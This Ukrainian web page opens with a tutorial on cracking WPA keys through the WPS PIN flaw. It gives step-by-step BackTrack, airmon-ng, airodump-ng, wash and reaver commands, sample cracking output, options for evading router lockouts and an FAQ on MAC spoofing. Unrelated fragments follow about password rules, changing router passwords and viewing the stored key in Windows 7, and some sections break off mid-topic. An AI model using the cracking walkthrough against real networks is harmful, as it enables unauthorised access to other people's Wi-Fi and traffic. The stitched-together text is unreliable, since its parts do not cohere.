Ключ безпеки від мобільної точки. Отримуємо WPA-ключ для Wi-Fi за допомогою вразливої ​​технології WPS

Ще недавно здавалося, що бездротова мережа, захищена за допомогою технології WPA2, цілком безпечна. Підібрати простий ключ для підключення можливо. Але якщо встановити по-справжньому довгий ключ, то його не допоможуть ні райдужні таблиці, ні навіть прискорення за рахунок GPU. Але, як виявилося, підключитися до бездротової мережі можна і без цього - скориставшись нещодавно знайденою вразливістю протоколу WPS.

WARNING

Вся інформація представлена ​​виключно з освітньою метою. Проникнення в чужу бездротову мережу легко можна розцінити як кримінальний злочин. Думай головою.

Ціна спрощень

Відкритих точок доступу, яких взагалі не треба вводити ключ для підключення, стає все менше і менше. Здається, що скоро їх можна буде занести до Червоної книги. Якщо раніше людина могла навіть і не знати, що бездротову мережу можна закрити ключем, убезпечивши себе від сторонніх підключень, то тепер їй все частіше нагадують про таку можливість. Взяти хоча б кастомні прошивки, що їх випускають провідні провайдери для популярних моделей роутерів, щоб спростити налаштування. Потрібно вказати дві речі - логін/пароль і ключ для захисту бездротової мережі. Що ще важливіше, самі виробники обладнання намагаються зробити процес налаштування нехитрим. Так, більшість сучасних роутерів підтримують механізм WPS (Wi-Fi Protected Setup). З його допомогою користувач за лічені секунди може налаштувати безпечну бездротову мережу, взагалі не забиваючи собі голову тим, що десь ще потрібно включити шифрування і прописати WPA-ключ. Ввів у системі восьмизначний символьний PIN, написаний на роутері, – і готово! І ось тут тримайся міцніше. У грудні відразу два дослідники розповіли про серйозні фундаментальні діри в протоколі WPS. Це як чорний хід для будь-якого роутера. Виявилося, що якщо в точці доступу активовано WPS (який, на хвилиночку, включений у більшості роутерів за замовчуванням), то підібрати PIN для підключення та витягти ключ для підключення можна за лічені години!

Як працює WPS?

Задум творців WPS хороша. Механізм автоматично вказує ім'я мережі та шифрування. Таким чином, користувачеві немає необхідності лізти у веб-інтерфейс та розбиратися зі складними налаштуваннями. А до вже налаштованої мережі можна без проблем додати будь-який пристрій (наприклад, ноутбук): якщо правильно ввести PIN, він отримає всі необхідні налаштування. Це дуже зручно, тому всі великі гравці на ринку (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) пропонують бездротові роутери з підтримкою WPS. Розберемося трохи докладніше.

Існує три варіанти використання WPS:

  1. Push-Button-Connect (PBC). Користувач натискає спеціальну кнопку на роутері (хардварну) та комп'ютері (софтварну), тим самим активуючи процес налаштування. Нам це нецікаво.
  2. Введення PIN-коду у веб-інтерфейс. Користувач заходить через браузер в адміністративний інтерфейс роутера і вводить там PIN-код із восьми цифр, написаний на корпусі пристрою (рисунок 1), після чого відбувається налаштування. Цей спосіб підходить скоріше для початкової конфігурації роутера, тому ми його не розглядатимемо.
  3. Введення PIN-коду на комп'ютері користувача (рис. 2). При з'єднанні з роутером можна відкрити спеціальну сесію WPS, в рамках якої налаштувати роутер або отримати вже наявні налаштування, якщо правильно ввести PIN-код. Ось це вже привабливо. Для відкриття подібної сесії не потрібна жодна автентифікація. Це може зробити будь-хто! Виходить, що PIN-код вже потенційно схильний до атаки типу bruteforce. Але це лише квіточки.

Вразливість

Як я вже помітив раніше, PIN-код складається з восьми цифр - отже, існує 10 ^ 8 (100 000 000) варіантів для підбору. Однак кількість варіантів можна суттєво скоротити. Справа в тому, що остання цифра PIN-коду є якоюсь контрольною сумою, яка вираховується на підставі семи перших цифр. У результаті отримуємо вже 10 7 (10 000 000) варіантів. Але це ще не все! Далі уважно дивимося пристрій протоколу аутентифікації WPS (рисунок 3). Таке відчуття, що його спеціально проектували, щоби залишити можливість для брутфорсу. Виявляється, перевірка PIN-коду здійснюється у два етапи. Він ділиться на дві рівні частини, і кожна частина перевіряється окремо! Подивимося на схему:

  1. Якщо після надсилання повідомлення M4 атакуючий отримав у відповідь EAP-NACK, він може бути впевнений, що перша частина PIN-коду неправильна.
  2. Якщо він отримав EAP-NACK після відсилання M6, то, відповідно, друга частина PIN-коду неправильна. Отримуємо 10^4 (10 000) варіантів для першої половини та 10^3 (1 000) для другої. У результаті маємо лише 11 000 варіантів для повного перебору. Щоб краще зрозуміти, як це працюватиме, подивися на схему.
  3. Важливий момент – можлива швидкість перебору. Вона обмежена швидкістю обробки роутером WPS-запитів: одні точки доступу видаватимуть результат кожну секунду, інші - кожні десять секунд. Основний час при цьому витрачається на розрахунок відкритого ключа алгоритму Діффі-Хеллмана, він повинен бути згенерований перед кроком M3. Витрачене цей час можна зменшити, обравши за клієнта простий секретний ключ, який надалі спростить розрахунки інших ключів. Практика показує, що для успішного результату зазвичай достатньо перебрати лише половину всіх варіантів, і в середньому брутфорс займає лише від чотирьох до десяти годин.

Перша реалізація

Першою реалізацією брутфорсу стала утиліта wpscrack (goo.gl/9wABj), написана дослідником Стефаном Фібеком мовою Python. Утиліта використовувала бібліотеку Scapy, що дозволяє ін'єктувати довільні пакети мережі. Сценарій можна запустити лише під Linux-системою, попередньо перевівши бездротовий інтерфейс у режим моніторингу. В якості параметрів необхідно вказати ім'я мережного інтерфейсу в системі, MAC-адресу бездротового адаптера, а також MAC-адресу точки доступу та її назву (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer started trying 00000000 attempt took 0.95 seconds trying 00010009<...>trying 18660005 attempt took 1.08 seconds trying 18670004# 1st half of PIN attempt took 1.09 seconds trying 18670011 attempt took 1.08 seconds<...>trying 18674095# found 2st half of PIN<...>Network Key: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 7 7 phras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Як бачиш, спочатку була підібрана перша половина PIN-коду, потім друга, і врешті-решт програма видала готовий до використання ключ для підключення до бездротової мережі. Важко уявити, скільки часу знадобилося б, щоб підібрати ключ такої довжини (61 символ) інструментами, що існували раніше. Втім, wpscrack не єдина утиліта для експлуатації вразливості, і це досить кумедний момент: у той же час над тією ж проблемою працював і інший дослідник - Крейг Хеффнер з компанії Tactical Network Solutions. Побачивши, що в Мережі з'явився працюючий PoC для реалізації атаки, він опублікував свою утиліту Reaver. Вона не тільки автоматизує процес підбору WPS-PIN і витягує PSK-ключ, але й пропонує більшу кількість налаштувань, щоб атаку можна було здійснити проти різних роутерів. До того ж вона підтримує набагато більше бездротових адаптерів. Ми вирішили взяти її за основу та детально описати, як зловмисник може використовувати вразливість у протоколі WPS для підключення до захищеної бездротової мережі.

HOW-TO

Як і для будь-якої іншої атаки на бездротову мережу нам знадобиться Linux. Тут треба сказати, що Reaver присутня в репозиторії всіма відомого дистрибутива BackTrack, в якому до того ж вже включено потрібні драйвера для бездротових пристроїв. Тому використати ми будемо саме його.

Крок 0. Готуємо систему

На офіційному сайті BackTrack 5 R1 доступний для завантаження у вигляді віртуальної машини під VMware та завантажувального образу ISO. Рекомендую останній варіант. Можна просто записати образ на болванку, а можна за допомогою програми зробити завантажувальну флешку: так чи інакше, завантажившись з такого носія, ми без зайвих проблем відразу матимемо систему, готову до роботи.

Експрес-курс зі злому Wi-Fi

  1. WEP (Wired Equivalent Privacy) Найперша технологія захисту бездротової мережі виявилася вкрай слабкою. Зламати її можна буквально за кілька хвилин, використовуючи слабкості шифру RC4, що застосовується в ній. Основними інструментами тут є сніфер airodump-ng для збору пакетів і утиліта aircrack-ng, що використовується безпосередньо для злому ключа. Також існує спеціальна тулза wesside-ng, яка взагалі зламує усі найближчі точки з WEP в автоматичному режимі.
  2. WPA/WPA2 (Wireless Protected Access)

Перебір – це єдиний спосіб підібрати ключ для закритої WPA/WPA2 мережі (та й то виключно за наявності дампа так званого WPA Handshake, який передається в ефір при підключенні клієнта до точки доступу).

Брутфорс може затягнутися на дні, місяці та роки. Для підвищення ефективності перебору спочатку використовувалися спеціалізовані словники, потім були згенеровані райдужні таблиці, пізніше з'явилися утиліти, що задіяли технології NVIDIA CUDA та ATI Stream для апаратного прискорення процесу за рахунок GPU. Використовувані інструменти - aircrack-ng (брутфорс за словником), cowpatty (за допомогою райдужних таблиць), pyrit (з використанням відеокарти).

Крок 1. Вхід у систему

Логін та пароль для входу за промовчанням – root:toor. Опинившись у консолі, можна сміливо стартувати «ікси» (є окремі збірки BackTrack - як з GNOME, так і з KDE):

# startx

Крок 2. Установка Reaver

Щоб завантажити Reaver, нам знадобиться інтернет. Тому підключаємо патчкорд або налаштовуємо бездротовий адаптер (меню «Applications > Internet > Wicd Network Manager»). Далі запускаємо емулятор терміналу, де завантажуємо останню версію утиліти через репозиторій:

# apt-get update # apt-get install reaver

Тут треба сказати, що в репозиторії є версія 1.3, яка особисто в мене запрацювала неправильно. Знайшовши інформацію про проблему, я знайшов пост автора, який рекомендує оновитися до максимально можливої ​​версії, скомпілювавши вихідні джерела, взяті з SVN. Це, загалом, найуніверсальніший спосіб установки (для будь-якого дистрибутива).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

Жодних проблем зі складанням під BackTrack не буде - перевірено особисто. У дистрибутиві Arch Linux, яким користуюся я, установка робиться ще простіше, завдяки наявності відповідного PKGBUILD'а:

$ yaourt -S reaver-wps-svn

Крок 3. Підготовка до брутфорсу

Для використання Reaver необхідно зробити такі речі:

  • перевести бездротовий адаптер у режим моніторингу;
  • дізнатися ім'я бездротового інтерфейсу;
  • дізнатися MAC-адресу точки доступу (BSSID);
  • переконайтеся, що на точці активовано WPS.

Для початку перевіримо, що бездротовий інтерфейс взагалі присутній у системі:

# iwconfig

Якщо у виведенні цієї команди є інтерфейс з описом (зазвичай це wlan0) – це означає, що система розпізнала адаптер (якщо він підключався до бездротової мережі, щоб завантажити Reaver, то краще обірвати підключення). Переведемо адаптер у режим моніторингу:

# airmon-ng start wlan0

Ця команда створює віртуальний інтерфейс у режимі моніторингу, його назва буде вказана у виведенні команди (зазвичай mon0). Тепер нам треба знайти точку доступу для атаки та дізнатися її BSSID. Скористайтеся утилітою для прослуховування бездротового ефіру airodump-ng:

# airodump-ng mon0

На екрані з'явиться список точок доступу у радіусі досяжності. Нас цікавлять точки із шифруванням WPA/WPA2 та автентифікацією за ключом PSK.

Краще вибирати одну з перших у списку, тому що для проведення атаки бажаний гарний зв'язок із точкою. Якщо точок багато і список не вміщується на екрані, то можна скористатися іншою відомою утилітою – kismet, там інтерфейс більш пристосований у цьому плані. Опціонально можна на місці перевірити, чи увімкнено на нашій точці механізм WPS. Для цього в комплекті з Reaver (але якщо брати його з SVN) йде утиліта wash:

# ./wash -i mon0

Як параметр задається ім'я інтерфейсу, переведеного в режим моніторингу. Також можна використовувати опцію '-f' і згодувати утиліті cap-файл, створений, наприклад, тим самим airodump-ng. З незрозумілої причини пакет Reaver в BackTrack не включили утиліту wash. Сподіватимемося, до моменту публікації статті цю помилку виправлять.

Крок 4. Запускаємо брутфорс

Тепер можна розпочинати безпосередньо перебір PIN'у. Для старту Reaver у найпростішому випадку потрібно небагато. Необхідно лише вказати ім'я інтерфейсу (переведеного нами раніше у режим моніторингу) та BSSID точки доступу:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

Ключ "-vv" включає розширений висновок програми, щоб ми могли переконатися, що все працює як слід.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 (ESSID: linksys) [+] Trying pin 63979978

Якщо програма послідовно відправляє PIN'и точці доступу, значить все завелося добре, і залишається тупо чекати. Процес може затягнутися. Найкоротший час, за який мені вдалося збрутфорсувати PIN, становив приблизно п'ять годин. Як тільки його буде підібрано, програма радісно про це повідомить:

[+] Trying pin 64637129 [+] Key cracked in 13654 seconds [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Найцінніше тут - це, звичайно, ключ WPA-PSK, який відразу ж можна використовувати для підключення. Все так просто, що навіть не вкладається у голові.


Чи можна захиститись?

Захиститися від атаки можна поки одним способом – відключити нафіг WPS у налаштуваннях роутера. Щоправда, як виявилося, зробити це можливо далеко не завжди. Оскільки вразливість існує не на рівні реалізації, а на рівні протоколу, чекати від виробників швидкого патчу, який би вирішив усі проблеми, не варто. Найбільше, що вони можуть зробити зараз, – це максимально протидіяти брутфорсу. Наприклад, якщо блокувати WPS на годину після п'яти невдалих спроб введення PIN-коду, перебір займе вже близько 90 днів. Але інше питання, як швидко можна накотити такий патч на мільйони пристроїв, які працюють по всьому світу?

Прокачуємо Reaver

У HOWTO ми показали найпростіший та найбільш універсальний спосіб використання утиліти Reaver. Проте реалізація WPS у різних виробників відрізняється, тому в деяких випадках необхідне додаткове налаштування. Нижче наведу додаткові опції, які можуть підвищити швидкість і ефективність перебору ключа.

  1. Можна задати номер каналу та SSID точки доступу: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Благотворно позначається на швидкості брутфорсу опція '-dh-small', яка задає невелике значення секретного ключа, тим самим полегшуючи розрахунки на стороні точки доступу: # reaver -i mon0 -b 00:01:02:03:04:05 -vv - -dh-small
  3. Таймаут очікування відповіді за умовчанням дорівнює п'яти секунд. При необхідності його можна змінити: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Затримка між стандартними спробами дорівнює одній секунді. Вона також може бути налаштована: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Деякі точки доступу можуть блокувати WPS на певний час, запідозривши, що їх намагаються отримати. Reaver цю ситуацію помічає та робить паузу в переборі на 315 секунд за умовчанням, тривалість цієї паузи можна змінювати: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Деякі реалізації протоколу WPS розривають з'єднання за неправильного PIN-коду, хоча за специфікацією повинні повертати особливе повідомлення. Reaver автоматично розпізнає таку ситуацію, для цього існує опція '—nack': # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Опція '—eap-terminate' призначена для роботи з тими АР, які вимагають завершення WPS-сесії за допомогою повідомлення EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
  8. Виникнення помилок у WPS-сесії може означати, що АР обмежує кількість спроб введення PIN-коду, або просто перевантажена запитами. Інформація про це відображатиметься на екрані. У цьому випадку Reaver припиняє свою діяльність, причому час паузи може бути заданий за допомогою опції '—fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

FAQ

Запитання: Який бездротовий адаптер потрібний для злому?

Відповідь: Перед тим, як експериментувати, переконайтеся, що бездротовий адаптер може працювати в режимі моніторингу. Найкращий спосіб - звіритися зі списком підтримуваного обладнання на сайті проекту Aircrack-ng. Якщо ж постане питання про те, який бездротовий модуль купити, то можна почати з будь-якого адаптера на чіпсеті RTL8187L. USB'шні донгли легко знайти в інтернеті за 20 $.

Питання: Чому у мене виникають помилки timeout і out of order?

Відповідь: Зазвичай це відбувається через низький рівень сигналу та поганий зв'язок з точкою доступу. Крім того, точка доступу може заблокувати використання WPS.

Запитання: Чому у мене не працює спуфінг MAC-адреси?

Відповідь: Можливо, ти спуфіш MAC віртуального інтерфейсу mon0, а це не працюватиме. Треба вказувати ім'я реального інтерфейсу, наприклад wlan0.

Питання: Чому при поганому сигналі Reaver працює погано, хоча той же злом WEP проходить нормально?

Відповідь: Зазвичай зламування WEP відбувається шляхом повторного пересилання перехоплених пакетів, щоб отримати більше векторів ініціалізації (IV), необхідних для успішного злому. В цьому випадку неважливо, чи загубився якийсь пакет, чи якось був пошкоджений по дорозі. А ось для атаки на WPS необхідно суворе дотримання протоколу передачі пакетів між точкою доступу та Reaver для перевірки кожного PIN-коду. І якщо при цьому якийсь пакет загубиться, або прийде в непотрібному вигляді, доведеться знову встановлювати WPS-сесію. Це робить атаки на WPS набагато більш залежними від рівня сигналу. Також важливо пам'ятати, що якщо ваш бездротовий адаптер бачить точку доступу, то це ще не означає, що і точка доступу бачить тебе. Тож якщо ти є щасливим володарем високопотужного адаптера від ALFA Network та антени на пару десятків dBi, то не сподівайся, що вдасться поламати всі спіймані точки доступу.

Питання: Reaver постійно посилає точці доступу той самий PIN, у чому справа?

Відповідь: Перевірте, чи активовано на роутері WPS. Це можна зробити за допомогою утиліти wash: запусти її та перевір, що твоя мета знаходиться у списку.

Запитання: Чому я не можу асоціюватися з точкою доступу?

Відповідь: Це може бути через поганий рівень сигналу або тому, що ваш адаптер непридатний для подібних досліджень.

Питання: Чому я постійно отримую помилки rate limiting detected?Відповідь: Це відбувається через те, що точка доступу заблокувала WPS. Зазвичай це тимчасове блокування (близько п'яти хвилин), але в деяких випадках можуть вліпити перманентний бан (розблокування тільки через адміністративну панель). Є один неприємний баг у Reaver версії 1.3, через який не визначаються зняття таких блокувань. Як воркараунд пропонують використовувати опцію '—ignore-locks' або завантажити останню версію з SVN.

Питання: Чи можна одночасно запустити два та більше екземплярів Reaver для прискорення атаки?

Відповідь: Теоретично можна, але якщо вони будуть довбати одну й ту саму точку доступу, то швидкість перебору навряд чи збільшиться, тому що в даному випадку вона обмежується слабким залізом точки доступу, яка вже за одного атакуючого завантажується на повну.

Якщо маршрутизатор лише куплений, і ніхто не проводив його налаштування, до новоствореної мережі можна підключитися без введення будь-яких ідентифікаційних даних. Тобто, будь-який власник пристрою з модулем Wi-Fi може користуватися всіма принадами інтернету без дозволу власника обладнання. Щоб цього не сталося, потрібно відразу після створення мережі змінити пароль на Wi-Fi роутері.

Можливо, поява зайвого користувача не позначиться на швидкості – більшість провайдерів може забезпечити її гідний рівень при безлімітному трафіку. Але, на жаль, не все так просто. Є низка негативних обставин, про можливість виникнення яких слід пам'ятати, залишаючи мережу без належного захисту.

Кожний пристрій вимагає від модему виділення IP адреси та апаратних ресурсів для забезпечення зв'язку. Все це створює додаткове навантаження на роздавальне обладнання, яке в свою чергу негативно впливатиме на швидкість і стабільність з'єднання в цілому. Крім того, відсутність парольного захисту знижує загальний рівень безпеки і дещо спрощує доступ до особистої інформації.

Вищепереліченого цілком достатньо, щоб задуматися про зміну налаштувань авторизації, особливо якщо такі відсутні, наприклад, при запуску нового роутера. Далі розглянемо, як швидко змінити або встановити пароль Wi-Fi на роутерах різних виробників (не слід плутати з налаштуваннями входу в адмін-панель). Будуть порушені деякі важливі моменти щодо налаштувань безпеки.

Правила складання пароля

Забезпечити належний рівень безпеки здатний далеко не кожен новий пароль. Багато користувачів, особливо початківці, воліють не морочити голову і вводять набір простих цифр, наприклад, всі одиниці або 12345678. Більш винахідливі використовують своє ім'я або дату народження. Сенс зрозумілий: щоб недовго думати та легко запам'ятати.

Відео зі складання правильного пароля:

Злам мережі з подібним захистом займе не більше 5 хвилин навіть у школяра, який не полінуеться прочитати пару статей в інтернеті. Існує маса програм, до яких додаються об'ємні словники, які часто використовуються ключами безпеки. Достатньо мати бажання, звичайний ноутбук чи смартфон, щоб забезпечити вільний доступ до мережі безтурботних сусідів.

Який має бути новий пароль:

  • Потрібно використовувати 8 і більше символів (менше не дозволить стандарт);
  • Має складатися з латинських літер різного регістру (великих і маленьких), цифр, знаків (@$# та інших);
  • Послідовність символів має бути випадковою та різноманітною. Тобто не потрібно вводити 6 однакових букв, а наприкінці кілька знаків та чисел. Хороший пароль повинен викликати страх при думці, що його потрібно запам'ятати.
  • Як уже говорилося вище: жодних простих чисел, імен та дат народження.

Деяким користувачам складно самостійно вигадати пароль для заміни. Тоді можна вдатися до допомоги спеціальних онлайн-генераторів, які складуть код будь-якої довжини та складності. Крім цього, у мережі є сервіси підбору та зберігання захисних даних.

Відео для роботи з утилітою для створення та зберігання паролів:

Після того, як підходящий пароль придумали або згенерували його необхідно зберегти. Сподіватися на власну пам'ять не варто, краще записати на папері, наприклад, у блокнот. Паралельно з паперовим варіантом можна створити текстовий файл на комп'ютері.

Припустимо, пароль згенеровано або придумано, записано і збережено на декількох носіях. Толку від цього мало, поки він не використовується в налаштуваннях безпеки Wi-Fi мережі. Далі розглянемо процес зміни пароля на роутері.

Змінюємо пароль

Щоб змінити параметри захисту точки доступу, потрібно потрапити в її інтерфейс керування. Для цього необхідно скористатися адресним рядком браузера або утилітою, що постачається на диску з деякими роутерами. Перший спосіб більш простий та універсальний.

Спочатку з'ясуємо IP-адресу маршрутизатора. Найчастіше це . Точне значення вказано на етикетці знизу приладу.

Також можна дізнатися дані для авторизації користувача, задані за замовчуванням. Як видно з малюнка, логін та пароль admin. Подібна комбінація є актуальною для більшості моделей. Якщо раптом наклейка загубилася або стерлася, необхідна інформація є в інструкції, якщо немає інструкції, дивимось в Інтернеті.

Тут треба активувати радіокнопку, яку вказує червона стрілка, після чого налаштувати поля знизу.

  • Версія. Залишаємо "Автоматично" для коректної роботи з великою кількістю пристроїв.
  • Шифрування. Вибираємо AES (найнадійніший і перевірений стандарт).
  • Пароль PSK. У це поле вписуємо придуманий чи згенерований ключ безпеки мережі.

Після вказівки всіх необхідних параметрів підтверджуємо зміни натисканням кнопки Зберегти і перезавантажуємо роутер. Пропозиція перезавантаження з'явиться на тій же сторінці. У разі його відсутності перезавантаження необов'язкове, але його варто виконати, щоб усі підключені користувачі Вай-Фай пройшли авторизацію. Зробити це можна через системні інструменти.

Після всіх вищеописаних маніпуляцій перший доступ до бездротової мережі буде можливим лише після введення пароля. Якщо згодом потрібно перевстановити захисні дані, доведеться зробити ту ж послідовність дій, що й для встановлення нового ключа авторизації.

Складнощі, які можуть виникнути під час налаштування безпеки

Найпоширенішими проблемами є відсутність або втрата IP-адреси адмін-панелі або даних аутентифікації в ній. Вирішується вона просто: прошивка маршрутизатора наводиться до заводського стану за допомогою спеціальної кнопки.

На моделі TP-Link її потрібно натиснути та утримувати протягом 10 сек. Налаштування скинуться до заводських і можна буде увійти за стандартною адресою за допомогою авторизації пари admin/admin.

У разі втрати або зміни IP-адреси (наприклад, її змінили, якщо в мережі кілька однакових роутерів), дізнатися її можна, запустивши консоль Windows на ноутбуці чи ПК. Щоб це зробити, потрібно набрати комбінацію Windows+R, відкриється вікно Виконати, в якому вводимо cmd. Запуститься консоль. У ній пишемо "ipconfig" і тиснемо "Enter".

Навпроти напису «Основний шлюз» буде адреса роутера, до якого підключено пристрій.

Зміна пароля на популярних роутерах

Використовуючи вищеописану послідовність дій, можна змінити пароль будь-якому Wi-Fi роутері. Відмінності можуть бути в інтерфейсі керування точкою доступу, її адресою та даними авторизації. Далі потрібно знайти вкладку захист бездротового режиму або подібний пункт меню. Розглянемо докладніше, як відбувається зміна пароля для популярних моделей.

D-Link

Адреса: 192.168.0.1. Пара логін/пароль: admin. На головній сторінці знизу вибираємо "Розширені налаштування".

На наступному вибираємо "Налаштування безпеки" (обведено рамкою).


Це природне явище відбувається тому, що клієнтське обладнання намагається використовувати старий ключ, який вже не є актуальним. Вирішується проблема двома способами:

  1. На мобільних андроїд пристроях достатньо розірвати зв'язок з мережею і встановити її заново, використовуючи при цьому новий код доступу.
  2. Для Windows потрібно спочатку видалити мережу, потім її знову додати, вказавши правильні дані авторизації.

Після усунення цих незначних проблем мережа має працювати. Такого захисту цілком достатньо для домашнього використання. Якщо є необхідність організувати безпеку в офісі або на підприємстві, слід вдатися до більш витончених методів.

Це питання стало досить актуальним і поширеним, оскільки зараз більшість користуються бездротовою мережею. Використання Wi-Fi технології є найпопулярнішим у наш час.

Так як зараз вибір гаджетів великий і весь час з'являються нові моделі, про що можна прочитати, можливість входу в Інтернет в будь-якому місці вкрай важлива.

Wi-Fi мережа вже увійшла в життя кожної людини, яка користується світовою павутиною. Це дуже зручно, завжди висока швидкість передачі даних, і до неї можна підключитися практично в будь-якій точці.

У чому ж основні переваги бездротової мережі? Ось кілька характеристик:

  • немає потреби користуватися кабелем;
  • доступне підключення;
  • висока швидкість;
  • можна об'єднати відразу кілька гаджетів та пристроїв;
  • подача сигналу відбувається за допомогою спеціального роутера.

Як вже стало зрозуміло при користуванні такою мережею не виникає особливих проблем та складнощів, людина може без особливих зусиль користуватися Інтернетом та обмінюватись даними.

Що таке ключ безпеки

Багато хто при підключенні до бездротової мережі за допомогою ноутбука задають питання про те, що таке ключ безпеки.

Це спеціальний код, який ви вигадуєте самі, що дозволяє повністю закрити доступ до вашої мережі. Наприклад, так часто буває, коли людина живе на невеликій відстані, а інші люди можуть підключитися до бездротового з'єднання, якщо ключ безпеки не встановлений.

При створенні такого пароля, зверніть увагу не на ключ, а на вибір типу шифрування. Це з тим, що з установці зв'язку ПК з бездротовим з'єднанням відбувається повна шифрування даних.

При введенні неправильного пароля ноутбук може просто не розкодувати його і тоді виникнуть деякі складнощі. Все це передбачено для повної безпеки ваших даних та всієї інформації, яка зберігається або передається по з'єднанню.

Є типи бездротового підключення (WPA, WPA2), які вимагають обов'язкового введення такого ключа, інакше здійснити підключення буде неможливо.

Відмінність цих двох варіантів безпеки полягає в тому, що в першому випадку потрібен спільний пароль, який можуть використовувати всі учасники та користувачі підключення. Другий вид передбачає отримання унікального ключа кожною людиною.

В основному, сучасні роутери для підключення до мережі відрізняються наявністю обох технологій, тому користувачі можуть вибирати найбільш підходящий варіант для себе.

Що таке ключ безпеки Wi-Fi мережі дивимося у відео:

Інструкція

Ключ безпеки створюється за допомогою майстра установки маршрутизатора. Існує три основні типи шифрування: доступ Wi-Fi (WPA та WPA2), Wired Equivalent Privacy (WEP) та 802.1x. Тому іноді виникає потреба у пошуку ключа безпеки. Зробити це дуже просто. Щоб знайти ключ безпеки на панелі швидкого доступу, запустіть меню «Пуск» і виберіть зі списку «Панель керування».

Після виконання цих дій відкриється вікно, де можна змінювати різні параметри комп'ютера. Необхідно вибрати категорію «Мережа та Інтернет». Далі натисніть ліву кнопку миші на функцію «Центр управління мережами та загальним доступом».

Відкриється вікно з основними відомостями про мережу та налаштування підключень. Потрібно вибрати пункт «Керування бездротовими мережами». На екрані монітора з'явиться список усіх доступних бездротових мереж.

Потім клацніть правою кнопкою миші за назвою бездротової мережі, до якої був забутий пароль.

Натисніть на вкладку "Безпека". Відкриється вікно з різними функціями. Необхідно знайти пункт «Відображати знаки, що вводяться», і поставити поруч галочку. Через деякий час на моніторі комп'ютера з'явиться код безпеки.

Ключ може містити у своєму складі не лише літери латинського алфавіту, а й цифри. Цей спосіб використовується не випадково, оскільки подібна комбінація символів є досить складною. Це дозволить захистити дані від несанкціонованого доступу.

Можете скористатися ключем двома способами. Його потрібно скопіювати в спеціальне поле для вставки або самостійно набрати на клавіатурі. Перший варіант ефективніший, тому що в цьому випадку виключається можливість друкарської помилки. Внаслідок цього з'являється можливість зміни раніше забутого пароля.

Необхідність захисту бездротового з'єднання не викликає сумнівів у жодного користувача. КлючБезпека служить основним інструментом у виконанні такого захисту. Тому зміна ключа безпеки бездротової мережізаслуговує на найсерйозніші стосунки.

Вам знадобиться

  • - Windows 7.

Інструкція

Викличте головне меню операційної системи Microsoft Windows натисканням кнопки «Пуск» і перейдіть в пункт «Панель управління» для виконання операції налаштування ключа безпеки бездротової мережі.

Введіть значення «мережа» у полі рядка пошуку та натисніть кнопку «Знайти» для підтвердження виконання команди.

Вкажіть пункт «Центр керування мережами та спільним доступом» та перейдіть до пункту «Встановлення підключення або мережі».

Переконайтеся в тому, що зрозумілі відмінності між трьома основними методами шифрування даних, що застосовуються в бездротових з'єднаннях: WPA або WPA2 (захищений доступ Wi-Fi) - забезпечує шифрування під час обміну даними між пристроєм і точкою доступу з використанням ключа безпеки, що є парольною фразою ;- Wired Equivalent Privacy (WEP) - не рекомендований застарілий метод захисту, що підтримується ранніми версіями обладнання; - протокол 802.1х - застосовується в корпоративних мережах.

Вкажіть бажані значення імені мережіі парольної фрази ключа безпеки у відповідних полях вікна майстра налаштування, що відкрилося, і застосуйте прапорець на полі «Підключатися автоматично».

Вкажіть команду «Підключитися до бездротової мережівручну» та виконайте натискання кнопки «Далі» за необхідності використання WEP методу шифрування.

Скористайтеся опцією WEP у розділі «Тип безпеки» у діалоговому вікні інформації про бездротову, що відкрилося. мережіта вкажіть необхідні значення у відповідних полях.

Перейдіть на вкладку «Безпека» нового діалогового вікна та застосуйте прапорець на полі «Загальний» у групі «Тип безпеки».

Підтвердіть свій вибір натисканням кнопки OK та застосуйте вибрані зміни натисканням кнопки «Закрити».

Джерела:

  • Налаштування ключа безпеки бездротової мережі
  • Налаштування бездротової мережі
  • як у налаштуваннях змінити доступ до мережі

Для того, щоб продовжувати користуватися операційною системою або іншим програмним забезпеченням, необхідно ввести у вікно активації спеціальний код, доступний на підставі серійного номера продукту. Найчастіше активацію можна виконати телефоном або через інтернет.

Ключ безпеки мережі є паролем, використовуючи який можна підключитися до мережі Wi-Fi, що працює. Від нього залежить безпечне функціонування бездротової мережі. Основне завдання його полягає в захисті користувача (господаря) Wi-Fi від несанкціонованого підключення до неї. Деяким може здатися, що таке підключення загалом не сильно заважатиме роботі в інтернеті. Насправді воно загрожує значним зменшенням швидкості інтернету. Тому, створенню пароля необхідно приділяти найпильнішу увагу.

Крім власне складності пароля, на ступінь безпеки бездротової мережі Wi-Fi значною мірою впливає тип шифрування даних. Значимість типу шифрування пояснюється лише тим, що це дані, передані у межах конкретної мережі зашифровані. Така система дозволяє захиститися від несанкціонованого підключення, тому що не знаючи пароля, сторонній користувач за допомогою свого пристрою просто не зможе розшифрувати дані, що передаються в рамках бездротової мережі.

Види шифрування мережі

В даний час Wi-Fi маршрутизатори використовують три різні типи шифрування.

Вони відрізняються один від одного не лише кількістю доступних для створення пароля символів, але й іншими не менш важливими особливостями.

